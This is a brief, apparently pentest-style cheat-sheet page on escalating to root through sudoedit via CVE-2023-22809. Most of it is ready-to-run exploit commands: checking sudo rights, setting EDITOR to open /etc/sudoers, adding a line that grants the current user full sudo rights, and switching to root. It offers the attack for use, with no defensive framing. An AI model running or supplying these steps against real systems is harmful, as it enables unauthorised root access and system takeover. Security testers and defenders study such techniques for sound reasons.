Sudoedit Privilege Escalation
Last modified: 2023-03-29
Sudoedit is vulnerable to privilege escalation.
Investigation
sudo -l
(root) sudoedit /opt/example.txt
If we can execute sudoedit command as root, we might be able to escalate the privileges with some version.
Exploitation (CVE-2023-22809)
export EDITOR="vim -- /etc/sudoers"
sudoedit /opt/example.txt
In vim editor, add the following line in /etc/sudoers.
Assume the current username is “john”
john ALL=(ALL:ALL) ALL
After that, we can escalate to root privilege.
sudo su root